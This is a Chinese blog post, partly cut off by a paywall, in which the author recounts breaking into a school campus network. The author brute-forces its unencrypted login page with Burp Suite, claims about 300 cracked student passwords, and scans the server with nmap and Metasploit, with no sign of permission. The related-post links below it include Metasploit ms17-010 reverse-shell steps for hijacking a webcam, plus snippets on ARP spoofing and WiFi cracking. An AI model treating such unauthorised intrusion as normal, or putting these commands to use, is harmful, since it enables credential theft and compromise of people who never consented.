入侵某学校校园网过程

已于 2022-02-04 21:15:00 修改
阅读量3.4w 收藏 348
点赞数 66
CC 4.0 BY-SA版权
分类专栏: 0day漏洞(edu漏洞)挖掘案例分享 文章标签: 安全 信息安全 web
于 2020-05-28 16:29:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33942040/article/details/106407538
博主无意中连接到校园网并使用Burp Suite抓取未加密的登录包,通过爆破获取大量密码。随后,利用Nmap扫描发现服务器开放多个高危端口,存在445端口漏洞,但出于道德考虑并未深入攻击。揭示了校园网络安全的严重问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

校园网一直被喷垃圾
因此一直也没开过校园网,一直都是手机热点续命,也正是因为这个,电脑打开wifi连接的时候,一不小心就跳转到了校园网连接界面去了,又因为本来自己的浏览器就挂了代理的
登录界面如下
在这里插入图片描述
于是正常的用burp抓了下网页的包
发现密文这些都没有任何的加密,类似于这个,密文直接没有任何的加密,还没有验证码机制
在这里插入图片描述
于是习惯性的用burp的攻击模块跑了下包,爆破了一些密码出来,跑了几个小时应该随便弄出来300多个吧(涉及到隐私因此疯狂打码)
在这里插入图片描述
你以为这样我就满足了?
不可能这样的,作为一个渗透手,要么就别玩,要玩的话就挖到底

于是果断去kali里面用namp扫描这个服务器开发的端口
扫描出来开放的一大堆,21,22,445,85端口,(于是心里一惊,这个服务器的安全做的真是好烂)
于是去了msfconsole查找了下自己习惯的端口445
发觉具有漏洞,然后玩到这里也不想玩了,毕竟我可是个好人,攻击嘛还是算了
(具体是什么漏洞这里就不

了解本专栏 订阅专栏 解锁全文 超级会员免费看
使用Kali无线渗透获取宿舍WiFi密码(WPA)
Mi1k7ea
08-02 9万+
最近没啥时间写博客了,就把之前的一些笔记但是没写到博客上的都更上来吧~ 无线安全水很深,本人前段时间也是因为实验报告内容是关于无线渗透的才接触了一些在Kali中关于无线渗透的一些命令,不足不处很多,望大牛们指教~ 本人宿舍的无线加密协议为WPA,因而着此次是针对WPA进行操作的,本机当时的网是自己开的有线网络没连宿舍的WiFi,当时也不知道宿舍的密码是不是弱口令,就尝试一下吧。 相关WEP、
记我一次成功的入侵学校网站服务器的黑客行动
诗歌年华
12-22 1万+
如何破校园网
A_991128a的博客
07-25 6014
前端做的不是很好,前端UI布局写的较差,后端接口也不太严谨,能够透露出些信息容易被利用,在找漏洞的过程中发现一个反射型的xss,用处不是很大毕竟要受害者点击才能执行恶意代码,我找到的这些东西和思路都总结在下面。1.前端的错误提示不要给的太明显,可以写成这样 “账号或者密码错误”。2.对账号密码的加密,虽然可以通过JS逆向出来但也可以增加安全性。3.对前端错误次数做限制再加上验证码,虽然可以破解但也可以增加安全性。4.当你拿到账号时登录后请先修改强密码,防止弱口令登录。
Kali远程控制win7摄像头
muyuxiangzi的博客
06-10 150
set payload windows/x64/meterpreter/reverse_tcp(反向链接。set rhosts 192.168.0.103 对应攻击目标 (lhost是攻击kali。set rhosts 192.168.0.103(设置攻击目标。search ms17-010搜索微软17年出现的第十个漏洞。nmap 192.168.0.1/24查看整个网段的ip。webcam_list(列出可用摄像头。webcam_stream(视频监控webcam_snap(拍照。
如何通过计算机侵入学校网络,如何进行局域网入侵
weixin_39786341的博客
06-21 8280
局域网(Local Area Network,LAN)是指在某一区域内由多台计算机互联成的计算机组。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的日程安排、电子邮件和传真通信服务等功能,那么如何进行局域网入侵呢?今天就来和大家一起看看局域网入侵方法。入侵局域网电脑方法一1、 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 ...
Kali Linux 暴力破解学校办公室WiFi 总结
m0_58837469的博客
04-06 1万+
脑子里最开始萌生出这个想法的起因是在闲逛博客的时候看见的一篇kali Linux网络渗透的一篇文章。我决定把对面办公室的网络破解了。(刚入门计算机这个专业的黑客梦) 电脑装VMware、kali Linux、准备一块网卡(网卡要兼容kali Linux、我用的是RT3070L)、能敲键盘的手(脚也行) 装网卡(RT3070L)时出现的问题:虚拟机识别不了。必须要让虚拟机单练网卡才可以解决 Ctrl+shift+T 打开终端——> sudo su 输入密码 获取 root 权限—...
Kali社会工程学套件上的网站欺骗攻击(钓鱼欺骗篇)
我不是猫叔
09-03 2773
使用Kali社会工程学套件中的 website attack vectors工具中的Credential Harvester Attack Method功能(登录验证机制攻击俗称表单提交攻击)进行内网钓鱼部署(该教程将实际讲述如何用模板使用,和克隆部署) 一.成立攻击组织,搭建攻击环境。 kali IP 192.168.10.218 无线网络(公司无线) 欺骗目标 安卓手机 IP 10.1...
某中学校园网络建设工程设计建议.doc
07-12
XX中学校园网络建设工程设计建议主要关注如何构建一个高效、安全、易管理的校园网络环境,以满足教育信息化的需求。以下是对文档内容的详细解读: ### 第一章 概述 1.1 校园网概述 校园网学校内部的信息基础设施...
昆明某校园网改造项目网络技术方案.doc
05-29
本文档为昆明某校园网改造项目的网络技术方案,详细阐述了项目的技术要求、现有网络情况的分析、组网解决方案以及相关产品的介绍和项目的售后服务等方面的内容。 在项目概述中,明确指出了网络改造的必要性和项目的...
校园网络改建方案书.doc
最新发布
07-08
以下是某中学校园网络改建方案书的内容解读: 1. 校园网络系统建设目标:改建工作必须明确目标,比如要建设高速稳定的网络环境,促进教育教学和管理工作的有效开展,同时要确保系统的可扩展性,以适应未来技术的...
某大学校园网集成系统方案详解
根据提供的文件信息,我们能够展开...通过以上各点,我们可以深入理解一个校园网集成系统方案的设计和实施过程,并且了解其重要组成部分和注意事项。这对于负责校园网络建设和维护的IT专业人员来说,是极具价值的知识。
Kali Linux无线网络渗透测试教程
11-03
Kali Linux无线网络渗透测试教程无线网络(wireless network)是采用无线通信技术实现的网络。无线网络既包括允许用户建立远距离无线连接的全球语音和数据网络,也包括为近距离无线连接进行优化的红外线技术及射频技术,与有线网络的用途十分类似,最大的不同在于传输媒介的不同,利用无线电技术取代网线,可以和有线网络互为备份。
破解校园网
11-07
破解 蝴蝶的工具 supplicant helper 802.1x
校园网路由器破解教程
08-10
用于锐捷校园网路由器的破解,可以完美适用学校校园网安装路由器。里边包含了普通路由器的刷机固件和教程。
如何通过计算机侵入学校网络,简单的局域网入侵方法(特别适合于校园网络)...
weixin_39683241的博客
06-21 1万+
对于局域网入侵,一般无需任务工具软件,特别是校园的实验室网络,完全可以利用系统本身的工具来实现。在运行中输入cmd,然后输入netview即可查看局域网内的所有计算机,由于默认的telnet服务没有开启,因此在telnet远程主机之前,我们需要开启telnet服务。在计算机管理中选择连接到远程主机,然后输入用户名和密码即可连接至远程主机,然后在程序与服务中开启远程主机的telnet服务,现在我们就...
kali笔记(五)连接校园网
孤的博客
08-22 4896
首先需要下载 pppoeconf apt-get install pppoeconf 打开网络连接 nm-connection-editor 新建 一个网络连接,选择 DSL/PPPoE 连接类型 Parent interface eth0 username 学号@unicom Password ******...
实战入侵校园实验平台
qq_42383069的博客
11-24 7381
目标机:172.18.206.87(学校内网) 网址:www.manage.vslab… 9.26号和老师谈论了仿真实验网站的安全性,经过老师的允许,我开始有了寻找漏洞的想法。 寻寻觅觅,一时间来到了10月中旬, 首先看到它有上传功能,便想到了上传一句话木马,从响应头看到它是jsp写的,然后上传jsp大马,抓包改后缀,但是,没有返回路径????真的难受啊,折腾了好几天,最终,放弃吧…(后来我发现原...
关于学校网的渗透与入侵
hesphoros的个人博客
02-11 2944
学校漏洞扫描(不进行任何非法用途)
Kali渗透-ARP断网攻击与监听
热门推荐
道阻且长,行则将至
02-29 4万+
前言 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助Kali Linux系统内置的 nmap、arpspoof、driftnet、ettercap 等渗透测试工具对局域网内(同WIFI下)同一网段的PC主机、手机进行 ARP 欺骗和 流量监听,实现对目标主机/手机的断网攻击、图片窃取、密码监听等攻击目的。 环境说明 主机 IP地址 Kali Linu...
评论 18
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值